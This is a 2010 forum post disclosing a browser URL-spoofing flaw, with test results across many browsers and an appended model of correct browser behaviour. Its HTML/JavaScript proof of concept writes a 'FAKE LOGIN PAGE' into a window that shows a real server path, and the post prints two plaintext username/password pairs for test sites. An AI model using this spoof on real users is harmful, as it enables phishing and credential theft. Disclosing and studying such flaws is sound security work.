Professional Webmasters Community

Multiple Browsers Fake url folder & file Same origin Spoof

Post by andry, Wed Oct 06, 2010 5:52 am


#########################################
Multiple Browsers Fake url folder & file Same origin Spoof
##########################################

##############
Abstract
##############

A user opens his browser and tries to navigate to
http://www.host.com/admin/admin.php. This URL is on
the remote server and, if the user has privileges,
he can access the file admin.php.

If the file admin.php isn't on the server,
the user gets a 404 HTTP error from the server.

If the user tries to browse http://www.host.com/admin/
and this path isn't on the server, the user again gets a 404
HTTP error.

If the user presses the refresh button, the page reloads the content,
and if the user presses Ctrl+F5 it refreshes all the content of
the page.

Sometimes those HTTP errors like 404, 403 etc. are managed
by a third-party app, a toolbar, or with predefined
dynamic content built inside the browser.

#######################
Explanation
#######################

Multiple browsers have a flaw in this request/response handling
that allows an attacker to spoof the URL, or spoof the content
of a non-existent file or path, or spoof the URL and content
of a trusted file or path.

Also, an attacker can "trap" the browser in the spoofed web page, and
when the user presses F5 or the refresh button the page shows
the spoofed content, or if the user presses Ctrl+F5 the page
shows the spoofed content. Only in the Opera browser does this last
issue not work.


##################
Testing
##################

I tested it with Windows XP Home SP3 fully patched.
For testing, let's write a script like:

####################
SOURCE CODE OF POC
####################
online PoC =>http://cmspatch.200u.com/urlspoof.html

Code:

<html>
<head>
<title>Multiple Browsers Fake url folder & file Same Origin Spoof</title>
</head>
<body>
<center>
<h1>Multiple Browsers Fake url folder & file Same origin Spoof </h1>
</center>
<p>
<a href='modules/profile/admin/admin.php' target='_blank'><h2>real path</h2></a>
<a href='javascript:spoofolder()'><h2>spoof a url folder !!</h2></a> Non-existent path
<a href='javascript:spoofile()'><h2>spoof a url file !!</h2></a>  this file exists on the server.
<a href='javascript:spoofauth()'><h2>spoof a url with auth basic !!</h2></a><br>only exists protected and has a password.
</p>
<strong>pass for the cms. user Dismark pass souaktendio.</strong><br>
<strong>pass for Protected folder. user terrapro pass mayoristas.</strong>
<p></p>

<script>
// Each function opens a window on a path of this same origin, writes fake
// content into the new document before its navigation completes, alerts
// document.location (evaluated in this opener page), then stops the load.
function spoofolder()
{
a = window.open('modules/login')                 // non-existent folder: server answers 404
a.document.write('<h1>FAKE LOGIN PAGE</h1>')
a.document.write('<title>FAKE LOGIN PAGE</title>')
a.alert(document.location)
a.stop();
}
function spoofile()
{
a = window.open('modules/system/admin.php')      // file that really exists on the server
a.document.write('<h1>FAKE LOGIN PAGE</h1>')
a.document.write('<title>FAKE LOGIN PAGE</title>')
a.alert(document.location)
a.stop();
}
function spoofauth()
{
a = window.open('protected/admin/admin.php')     // file behind basic auth: server answers 401
a.document.write('<h1>FAKE LOGIN PAGE</h1>')
a.document.write('<title>FAKE LOGIN PAGE</title>')
a.alert(document.location)
a.stop();
}
</script>
</body></html>

######## END SOURCE #####

Save it as c:/test/urlspoof.html, for example.
I use one alert to show the real window.location.
For testing I opened the file using the file:/// protocol handler,
and for the remote test I uploaded the file to a server:
to an Apache on Windows 2003 and to an Apache on Linux Red Hat.

server windows:
Windows Server 2003
Apache/2.2.8 Win32
PHP/5.2.6
Server at ***********.com

server linux:

Apache/2.2.11 (Unix) mod_ssl/2.2.11
OpenSSL/0.9.8e-fips-rhel5
mod_auth_passthrough/2.1
FrontPage/5.0.2.2635 Server at ***********.com

In all test cases the server sent the correct
HTTP response.

########################
Locally affected Browsers
########################

For this test I used the file protocol handler and
only tested the file spoof and path spoof.

1 - Firefox 3.5.1 and 3.5.2
Open urlspoof via file c:/test/urlspoof.html and click
on any spoof function; in all cases Firefox shows the spoofed
URL and content. (Firefox 3.5.2 seems not vulnerable.)

2 - Lunascape 5.1.3 and 5.1.4 (switched to Trident engine)
Open urlspoof via file c:/test/urlspoof.html and click
on any spoof function; in all cases Lunascape shows the
spoofed URL and spoofed content.

3 - Orca browser 1.2 build 2 seems not vulnerable, but when browsing the file
the browser adds wyciwyg://4/ to the URL and executes the fake content.

4 - Flock 2.5.1
Open urlspoof via file c:/test/urlspoof.html and click
on any spoof function; in all cases Flock shows the
spoofed URL and spoofed content.

5 - K-Meleon 1.5.3
Open urlspoof via file c:/test/urlspoof.html and click
on any spoof function; in all cases K-Meleon shows the
spoofed URL and spoofed content.

6 - SeaMonkey 1.1.17
Open urlspoof via file c:/test/urlspoof.html and click
on any spoof function; in all cases SeaMonkey shows the
spoofed URL and spoofed content.

7 - Avant browser 11.7 build 36
Open urlspoof via file c:/test/urlspoof.html and click
on any spoof function; in all cases Avant shows the
spoofed URL and spoofed content.


Google Chrome 2.0.172.39 (official build)
writes in all three cases in about:blank.

Internet Explorer 8 seems not vulnerable via the file: protocol.


########################
Remotely affected Browsers
########################

For this test, upload the file to a server
and browse to the file via http://host.com/urlspoof.html

1 - Internet Explorer 7 and 8
Browse to the file and click on any link; in all
three tests the browser shows the spoofed file, spoofed path, and "pseudo-bypass"
of basic auth protection.

2 - Avant browser 11.7 build 35 and build 36
Browse to the file and click on any link; in all
three tests the browser shows the spoofed file, spoofed path, and "pseudo-bypass"
of basic auth protection.

3 - Lunascape 5.1.3 and 5.1.4 (switched to Trident engine)
Browse to the file and click on any link; in all
three tests the browser shows the spoofed file, spoofed path, and "pseudo-bypass"
of basic auth protection.

4 - Maxthon Browser 2.5.3.80 UNICODE
Browse to the file and click on any link; in all
three tests the browser shows the spoofed file, spoofed path, and "pseudo-bypass"
of basic auth protection.

Google Chrome writes in all cases in about:blank.

#################
Trap issue
#################

In all of the affected browsers, when you are at the fake URL
and you try to reload or refresh the location via Ctrl+F5
or F5 or similar, the browser does not show a 404 HTTP error;
it continues showing the fake page location.
It is very interesting, because an attacker can create a "ghost" file
in a "ghost" path.
In the case of the fake file, we can spoof any web page on the server
with the fake page, and when the user tries to reload or refresh it
the browser shows the fake page, not the real page location.

################## End ##################
andry
Moderator

Posts : 467
Join date : 2010-05-07
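As an added illustration, not part of andry's post or of the PoC above, here is a small JavaScript model of the address-bar binding a non-vulnerable browser has to keep: text written by the opener into a freshly opened window belongs to about:blank (the behaviour the post reports for Chrome), the URL bar and the body change together only when the server response commits, and a reload re-fetches the displayed URL, so a missing path comes back as a 404 rather than a "ghost" page. The server table, the class and the function names are constructed for this model.

```javascript
// Constructed stub of the server responses for the three paths in the PoC
// (bodies are mine; the post only says the real servers answered correctly).
const SERVER = {
  'modules/login': { status: 404, body: '404 Not Found' },
  'modules/system/admin.php': { status: 200, body: 'real admin.php' },
  'protected/admin/admin.php': { status: 401, body: '401 Authorization Required' },
};
class ModelWindow {
  constructor() {               // window.open() yields the initial about:blank document
    this.displayedUrl = 'about:blank';
    this.body = '';
    this.status = null;
    this.pendingUrl = null;     // navigation requested by the opener, not yet committed
  }
  open(url) { this.pendingUrl = url; return this; }
  documentWrite(html) {         // opener writes into the still-blank document
    // The text belongs to about:blank and document.open() aborts the pending
    // navigation, so the address bar must stay at about:blank.
    this.body = html;
    this.pendingUrl = null;
    this.displayedUrl = 'about:blank';
    return this;
  }
  commit() {                    // server response arrives: URL and body change together
    if (this.pendingUrl === null) return this;
    const res = SERVER[this.pendingUrl] || { status: 404, body: '404 Not Found' };
    this.displayedUrl = this.pendingUrl;
    this.status = res.status;
    this.body = res.body;
    this.pendingUrl = null;
    return this;
  }
  reload() {                    // F5 / Ctrl+F5 re-fetches the displayed URL
    if (this.displayedUrl === 'about:blank') return this;
    this.pendingUrl = this.displayedUrl;
    return this.commit();
  }
}
// PoC sequence (open, write fake content, stop): the fake page stays under
// about:blank and is never shown under the target URL.
function spoofAttempt(url) {
  const w = new ModelWindow().open(url).documentWrite('<h1>FAKE LOGIN PAGE</h1>').commit();
  return { url: w.displayedUrl, body: w.body };
}
// Normal navigation then reload: a missing path reloads as a 404, not a "ghost" page.
function navigateAndReload(url) {
  const w = new ModelWindow().open(url).commit().reload();
  return { url: w.displayedUrl, status: w.status, body: w.body };
}
```

The affected browsers in the post break the first invariant (fake body shown under the target URL) and the second (reload keeps the fake body instead of re-fetching).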
